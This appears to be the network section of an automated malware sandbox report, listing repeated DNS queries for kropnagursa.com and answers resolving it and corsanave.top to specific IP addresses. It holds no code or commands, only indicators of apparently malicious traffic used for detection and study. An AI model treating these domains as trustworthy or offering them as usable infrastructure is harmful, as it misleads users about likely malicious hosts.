                                                                                                                                            Feb 2, 2023 21:18:38.557245016 CET192.168.2.48.8.8.80xa6b8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:39.055634975 CET192.168.2.48.8.8.80xcf76Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:39.878312111 CET192.168.2.48.8.8.80x351bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:40.381735086 CET192.168.2.48.8.8.80x68f0Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:40.862077951 CET192.168.2.48.8.8.80xce4cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:41.344172955 CET192.168.2.48.8.8.80xde9cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:41.828485966 CET192.168.2.48.8.8.80x5730Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:42.405930042 CET192.168.2.48.8.8.80xbbbcStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:42.894630909 CET192.168.2.48.8.8.80xf8cdStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:44.025203943 CET192.168.2.48.8.8.80xa94Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:44.529158115 CET192.168.2.48.8.8.80xca56Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:45.018851042 CET192.168.2.48.8.8.80xc589Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:45.520154953 CET192.168.2.48.8.8.80xd8a9Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:45.998142004 CET192.168.2.48.8.8.80x2e7bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:46.780323982 CET192.168.2.48.8.8.80xce8aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:47.268290997 CET192.168.2.48.8.8.80xc831Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:47.749274015 CET192.168.2.48.8.8.80x6f92Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:48.459582090 CET192.168.2.48.8.8.80x66feStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:48.934384108 CET192.168.2.48.8.8.80x57cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:49.406881094 CET192.168.2.48.8.8.80xdf01Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:49.901174068 CET192.168.2.48.8.8.80x3363Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:50.394463062 CET192.168.2.48.8.8.80x44dcStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:50.870527983 CET192.168.2.48.8.8.80x1081Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:51.341730118 CET192.168.2.48.8.8.80x1b64Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:51.812439919 CET192.168.2.48.8.8.80xebb3Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:52.320120096 CET192.168.2.48.8.8.80x892dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:53.666529894 CET192.168.2.48.8.8.80x7731Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:54.147650003 CET192.168.2.48.8.8.80x95dcStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:54.677465916 CET192.168.2.48.8.8.80xe596Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:55.154275894 CET192.168.2.48.8.8.80xc277Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:56.160989046 CET192.168.2.48.8.8.80x15dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:56.685585022 CET192.168.2.48.8.8.80x5f2bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:57.540708065 CET192.168.2.48.8.8.80x699cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:58.274857044 CET192.168.2.48.8.8.80x434eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:58.760236979 CET192.168.2.48.8.8.80x6493Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:59.243019104 CET192.168.2.48.8.8.80xdd2aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:00.269114971 CET192.168.2.48.8.8.80x2278Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:00.828567982 CET192.168.2.48.8.8.80x19beStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:01.592289925 CET192.168.2.48.8.8.80x4407Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:02.122286081 CET192.168.2.48.8.8.80xea7eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:02.601735115 CET192.168.2.48.8.8.80x2e25Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:03.079417944 CET192.168.2.48.8.8.80xa985Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:03.567053080 CET192.168.2.48.8.8.80x87baStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:04.051028013 CET192.168.2.48.8.8.80xbfe4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:04.555200100 CET192.168.2.48.8.8.80xc4acStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:05.071281910 CET192.168.2.48.8.8.80x52a1Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:05.548815966 CET192.168.2.48.8.8.80x1cbaStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:06.015785933 CET192.168.2.48.8.8.80x295cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:06.627175093 CET192.168.2.48.8.8.80xe8aeStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:07.118973970 CET192.168.2.48.8.8.80x451bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:07.625185013 CET192.168.2.48.8.8.80x380eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:08.385324955 CET192.168.2.48.8.8.80x9f41Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:08.862154007 CET192.168.2.48.8.8.80x508eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:09.328540087 CET192.168.2.48.8.8.80xe470Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:09.814903021 CET192.168.2.48.8.8.80xb54aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:10.304399014 CET192.168.2.48.8.8.80x8bb4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:11.017219067 CET192.168.2.48.8.8.80xc3aeStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:11.511560917 CET192.168.2.48.8.8.80xa4c3Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:11.982359886 CET192.168.2.48.8.8.80xdfe2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:12.469464064 CET192.168.2.48.8.8.80x4c2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:12.955943108 CET192.168.2.48.8.8.80x194cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:13.428865910 CET192.168.2.48.8.8.80x4488Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:13.922076941 CET192.168.2.48.8.8.80xc9d1Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:14.674906015 CET192.168.2.48.8.8.80x2df9Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:15.437517881 CET192.168.2.48.8.8.80x7f21Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:15.922389030 CET192.168.2.48.8.8.80x11f8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:16.397048950 CET192.168.2.48.8.8.80x136Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:16.888860941 CET192.168.2.48.8.8.80x8157Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:17.493787050 CET192.168.2.48.8.8.80x3157Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:17.971503973 CET192.168.2.48.8.8.80x4841Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:19.074836969 CET192.168.2.48.8.8.80x6556Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:19.738254070 CET192.168.2.48.8.8.80xf64aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:20.219921112 CET192.168.2.48.8.8.80xba28Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:20.993315935 CET192.168.2.48.8.8.80xb8d6Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:21.469187975 CET192.168.2.48.8.8.80xeacaStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:21.962685108 CET192.168.2.48.8.8.80x8c3bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:22.440351009 CET192.168.2.48.8.8.80x2771Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:23.288600922 CET192.168.2.48.8.8.80x7debStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:23.773469925 CET192.168.2.48.8.8.80xe64eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:24.261455059 CET192.168.2.48.8.8.80x7c7fStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:24.825319052 CET192.168.2.48.8.8.80x819Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:25.300837040 CET192.168.2.48.8.8.80xd652Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:25.772694111 CET192.168.2.48.8.8.80x4459Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:26.266410112 CET192.168.2.48.8.8.80xb5daStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:26.742197037 CET192.168.2.48.8.8.80x6e6aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:27.229460955 CET192.168.2.48.8.8.80x61c7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:27.707123041 CET192.168.2.48.8.8.80xc288Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:28.193000078 CET192.168.2.48.8.8.80x71c3Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:29.284495115 CET192.168.2.48.8.8.80x86ddStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:29.969356060 CET192.168.2.48.8.8.80x2911Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:30.437196016 CET192.168.2.48.8.8.80xd84bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:30.907159090 CET192.168.2.48.8.8.80x78ffStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:31.382488012 CET192.168.2.48.8.8.80xbd66Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:31.843544006 CET192.168.2.48.8.8.80xd51aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:32.314034939 CET192.168.2.48.8.8.80xbf08Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:32.805125952 CET192.168.2.48.8.8.80x716fStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:33.265085936 CET192.168.2.48.8.8.80xfe8eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:34.208441019 CET192.168.2.48.8.8.80x7d38Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:34.690169096 CET192.168.2.48.8.8.80x4b2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:35.402889013 CET192.168.2.48.8.8.80xb610Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:35.924177885 CET192.168.2.48.8.8.80xb9d1Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:36.391515970 CET192.168.2.48.8.8.80x6395Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:36.879017115 CET192.168.2.48.8.8.80xc051Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:37.359069109 CET192.168.2.48.8.8.80x5fcbStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:38.064024925 CET192.168.2.48.8.8.80xcc00Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:38.533086061 CET192.168.2.48.8.8.80xf603Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:39.126015902 CET192.168.2.48.8.8.80xb48eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:39.637967110 CET192.168.2.48.8.8.80x150cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:40.116864920 CET192.168.2.48.8.8.80x5411Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:40.596076012 CET192.168.2.48.8.8.80x8ce8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:41.065854073 CET192.168.2.48.8.8.80x1681Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:41.536711931 CET192.168.2.48.8.8.80xb619Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:42.017083883 CET192.168.2.48.8.8.80xa3f2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:42.682730913 CET192.168.2.48.8.8.80x5e38Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:43.156552076 CET192.168.2.48.8.8.80x65ddStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:43.631649971 CET192.168.2.48.8.8.80xa195Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:44.132312059 CET192.168.2.48.8.8.80xa8b8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:44.611983061 CET192.168.2.48.8.8.80xd9d8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:45.113126993 CET192.168.2.48.8.8.80xe8d9Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:45.598403931 CET192.168.2.48.8.8.80x9265Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:46.207345963 CET192.168.2.48.8.8.80x1b6fStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:46.681526899 CET192.168.2.48.8.8.80x6cf8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:47.157361031 CET192.168.2.48.8.8.80xdd4dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:47.638366938 CET192.168.2.48.8.8.80xe36dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:48.114474058 CET192.168.2.48.8.8.80xfe1bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:48.584099054 CET192.168.2.48.8.8.80x34e9Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:49.667047024 CET192.168.2.48.8.8.80xa39dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:50.391196966 CET192.168.2.48.8.8.80xa5d2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:50.861761093 CET192.168.2.48.8.8.80x8414Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:51.336919069 CET192.168.2.48.8.8.80xf72bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:51.802838087 CET192.168.2.48.8.8.80xca88Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:52.517765999 CET192.168.2.48.8.8.80x4337Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:53.379025936 CET192.168.2.48.8.8.80x2d77Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:54.217449903 CET192.168.2.48.8.8.80xb055Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:54.692434072 CET192.168.2.48.8.8.80xe2b9Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:55.552577019 CET192.168.2.48.8.8.80x6ee7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:56.038275957 CET192.168.2.48.8.8.80x696eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:56.722712040 CET192.168.2.48.8.8.80x8bb4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:57.199896097 CET192.168.2.48.8.8.80x936cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:58.049459934 CET192.168.2.48.8.8.80xf169Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:58.902945995 CET192.168.2.48.8.8.80xb304Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:59.714857101 CET192.168.2.48.8.8.80x8367Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:00.179670095 CET192.168.2.48.8.8.80x4f80Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:01.281001091 CET192.168.2.48.8.8.80xaa95Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:01.754502058 CET192.168.2.48.8.8.80x7a07Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:02.238293886 CET192.168.2.48.8.8.80xb187Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:02.912820101 CET192.168.2.48.8.8.80x2a68Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:03.384833097 CET192.168.2.48.8.8.80xa814Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:04.069204092 CET192.168.2.48.8.8.80x1172Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:04.550748110 CET192.168.2.48.8.8.80x3ed5Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:05.700215101 CET192.168.2.48.8.8.80x4a3aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:06.182370901 CET192.168.2.48.8.8.80x42c8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:20:07.001142025 CET192.168.2.48.8.8.80xbc2dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Feb 2, 2023 21:16:55.313982964 CET8.8.8.8192.168.2.40x511fNo error (0)corsanave.top46.151.26.131A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:58.223357916 CET8.8.8.8192.168.2.40x8cf6No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:58.749706984 CET8.8.8.8192.168.2.40x4aefNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:59.341532946 CET8.8.8.8192.168.2.40x6025No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:59.866992950 CET8.8.8.8192.168.2.40xcda7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:00.441862106 CET8.8.8.8192.168.2.40xf15eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:01.098901033 CET8.8.8.8192.168.2.40x3f41No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:01.713701010 CET8.8.8.8192.168.2.40x3922No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:02.400403023 CET8.8.8.8192.168.2.40x7b47No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:02.986113071 CET8.8.8.8192.168.2.40xc15aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:03.762535095 CET8.8.8.8192.168.2.40xc725No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:05.843189001 CET8.8.8.8192.168.2.40x63f4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:06.604507923 CET8.8.8.8192.168.2.40xc43fNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:07.130682945 CET8.8.8.8192.168.2.40x795cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:07.855807066 CET8.8.8.8192.168.2.40x566bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:08.538374901 CET8.8.8.8192.168.2.40xd0dcNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:09.148353100 CET8.8.8.8192.168.2.40xaed2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:09.897906065 CET8.8.8.8192.168.2.40x7263No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:10.442338943 CET8.8.8.8192.168.2.40xf1eaNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:11.142081022 CET8.8.8.8192.168.2.40x9722No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:11.628314972 CET8.8.8.8192.168.2.40x8047No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:12.290879011 CET8.8.8.8192.168.2.40xfec6No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:12.997328997 CET8.8.8.8192.168.2.40x935aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:13.633780003 CET8.8.8.8192.168.2.40x46ffNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:14.401905060 CET8.8.8.8192.168.2.40x1e55No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:15.016834021 CET8.8.8.8192.168.2.40xe6c3No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:15.532660007 CET8.8.8.8192.168.2.40x8783No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:16.066742897 CET8.8.8.8192.168.2.40xfdf1No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:16.715190887 CET8.8.8.8192.168.2.40x8247No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:17.361974001 CET8.8.8.8192.168.2.40xcbeeNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:17.871100903 CET8.8.8.8192.168.2.40x3e1bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:18.366899014 CET8.8.8.8192.168.2.40xcfc6No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:18.976862907 CET8.8.8.8192.168.2.40xd5aaNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
